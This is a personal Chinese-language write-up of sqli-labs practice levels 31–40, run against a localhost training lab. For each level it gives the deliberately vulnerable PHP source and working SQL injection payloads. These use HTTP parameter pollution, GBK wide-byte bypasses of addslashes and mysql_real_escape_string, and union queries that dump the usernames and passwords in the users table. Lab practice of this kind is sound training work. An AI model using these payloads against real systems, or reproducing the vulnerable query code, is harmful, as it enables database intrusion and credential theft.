SQLI-LAB 的 实战记录(Less 31 - Less 40)
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 31 Protection with WAF
(第31节:用WAF防护 )
Test:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=3
注:显示的是id为3的内容
Sourse Code:
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
$match = preg_match("/^\d+$/", $input);
if($match) {
} else {
header('Location: hacked.php');
}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value) {
$val=substr($value,0,2);
if($val=="id") {
$id_value=substr($value,3,30);
return $id_value;
break;
}
}
}
Solution:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,2,3 --+
其它:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,version(),database() --+
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 32 Bypass addslashes()
(第32节:绕过 addslashes() )
Test:
http://localhost/sqli-lab/Less-32/index.php?id='"\\--+
注:单引号,双引号,反斜杠 均被添加斜线
http://localhost/sqli-lab/Less-32/index.php?id=�'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 注:id周围是单引号
http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+
注:将utf8的单引号转化成utf16的,可以通过 Decoder - Encoder: UTF8, UTF16, ...(需要FQ)
Sourse Code:
function check_addslashes($string){
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+
其它:
http://localhost/sqli-lab/Less-32/index.php?id=�' union select 1,version(),database() --+
http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 33 Bypass addslashes()
(第33节:绕过 addslashes() )
Test:
http://localhost/sqli-lab/Less-33/index.php?id=�'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 注:id周围是单引号
Sourse Code:
function check_addslashes($string){
$string= addslashes($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-33/index.php?id=�' or 1=1 --+
其它:
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,database(),version() --+
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 34 Bypass Add SLASHES
(第34节:绕过添加斜杠)
Test:
http://localhost/sqli-lab/Less-34/index.php
注:编码为gbk的数据库+addslashes() 有一个关于编码的漏洞 加上斜杠以后的字符编码是%BF%5C%27和%FE%5C%27
Sourse Code:
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=1%BF' or 1=1 #&passwd=1%BF' or 1=1 #&submit=Submit
uname=1%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit
其它:
uname=1%Bf' union select version(),database() #&passwd=1%BF' or 1=1 #&submit=Submit
uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit
注:如果采用这种办法,还是一直报编码错误的话,建议自行检查 数据库 及 其中 表 的编码
Less - 35 why care for addslashes()
(第35节:为什么要关心addslashes())
Test:
http://localhost/sqli-lab/Less-35/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 0,1' at line 1 注:id周围没有单引号或双引号
Sourse Code:
function check_addslashes($string){
$string = addslashes($string);
return $string;
}
$id=check_addslashes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,2,3 #
其它:
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,version(),database() #
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #
Less - 36 Bypass MySQL Real Escape String
(第36节:绕过 MySQL_real_escape_string )
Test:
http://localhost/sqli-lab/Less-36/index.php?id=%BF' or 1=1 #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 注:id周围是单引号
Sourse Code:
function check_quotes($string){
$string= mysql_real_escape_string($string);
return $string;
}
$id=check_quotes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' or 1=1%23
其它:
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,version(),database()%23
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1%23
Less - 37 MySQL_real_escape_string
(第37节:MySQL_real_escape_string )
Test:
http://localhost/sqli-lab/Less-38/index.php
uname=2'&passwd=1'&submit=Submit
注:失败,没有SQL查询报错
Sourse Code:
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=2%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit
其它:
uname=1%FE' union select version(),database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit
Less - 38 stacked Query
(第38节: 层次化查询)
Test:
http://localhost/sqli-lab/Less-38/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 注:id周围是单引号
Sourse Code:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
if($row = mysqli_fetch_row($result)){
printf("Your Username is : %s", $row[1]);
printf("Your Password is : %s", $row[2]);
}
}
if (mysqli_more_results($con1)){
}
}else{
print_r(mysqli_error($con1));
}
注:mysqli_more_results() 检查一个多重查询语句中是否有更多结果 Solution:
http://localhost/sqli-lab/Less-38/index.php?id=2%FE' or 1=1 %23
其它:
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,version(),database() %23
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 39 stacked Query Intiger type
(第39节:层次化查询 数字类型)
Test:
http://localhost/sqli-lab/Less-39/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 注:数字型
Sourse Code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
if($row = mysqli_fetch_row($result)){
printf("Your Username is : %s", $row[1]);
printf("Your Password is : %s", $row[2]);
}
}
if (mysqli_more_results($con1)){
}
}else{
print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-39/index.php?id=0 or 1=1 %23
其它:
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,version(),database() %23
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 40 stacked Query String type Blind
(第40节:层次化查询 字符串类型 盲注)
Test:
http://localhost/sqli-lab/Less-40/index.php?id=1
注:正常显示id为1的值
http://localhost/sqli-lab/Less-40/index.php?id=1'
注:没有显示报错
http://localhost/sqli-lab/Less-40/index.php?id=0' or 1=1 %23
http://localhost/sqli-lab/Less-40/index.php?id=0') or 1=1 %23
注:正常显示id为1的值
Sourse Code:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)) {
if ($result = mysqli_store_result($con1)) {
if($row = mysqli_fetch_row($result)) {
printf("Your Username is : %s", $row[1]);
printf("Your Password is : %s", $row[2]);
}
}
if (mysqli_more_results($con1)) {
}
}
Solution:
http://localhost/sqli-lab/Less-40/index.php?id=0%FE') or 1=1 %23
其它:
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,version(),database() %23
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23